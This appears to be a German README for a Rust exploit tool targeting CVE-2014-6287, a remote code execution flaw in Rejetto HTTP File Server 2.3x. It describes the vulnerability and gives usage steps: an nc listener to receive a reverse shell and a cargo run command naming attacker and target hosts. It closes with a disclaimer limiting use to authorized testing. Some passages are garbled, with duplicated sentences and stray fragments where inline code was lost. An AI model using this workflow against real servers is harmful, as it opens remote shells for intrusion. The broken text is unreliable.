
Eine Rust-Implementierung des CVE-2014-6287-Exploits, der Rejetto HTTP File Server (HFS) in den Versionen 2.3x vor 2.3c angreift.
Eine Rust-Implementierung des Exploits für CVE-2014-6287, der gegen Rejetto HTTP File Server (HFS) Versionen 2.3x vor 2.3c gerichtet ist.
CVE-2014-6287 ist eine kritische Schwachstelle zur Remote-Codeausführung im Rejetto HTTP File Server (HFS).
Die Funktion findMacroMarker in im Rejetto HTTP File Server ermöglicht es entfernten Angreifern, beliebige Programme über eine -Sequenz in einer Suchaktion auszuführen. Diese Schwachstelle erlaubt es Angreifern, die Eingabevalidierung zu umgehen und schädlichen Code einzuschleusen, der auf dem Zielsystem ausgeführt wird.
parserLib.pas%00Der Exploit funktioniert wie folgt:
%00) enthält{. und .}Bevor Sie den Exploit ausführen, richten Sie einen Listener auf Ihrem Angreiferrechner ein, um die Reverse-Shell zu empfangen:
# Ersetzen Sie <LPORT> durch den gewünschten Listening-Port
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: Ihre lokale IP-Adresse (Angreiferrechner)-p, --lport <LPORT>: Ihr lokaler Port für die Reverse-Shell-r, --rhost <RHOST>: Ziel-IP-Adresse (verwundbarer HFS-Server)-t, --rport <RPORT>: Zielport (Standard: 80)Dieses Tool dient ausschließlich Bildungs- und autorisierten Penetrationstest-Zwecken. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung haben.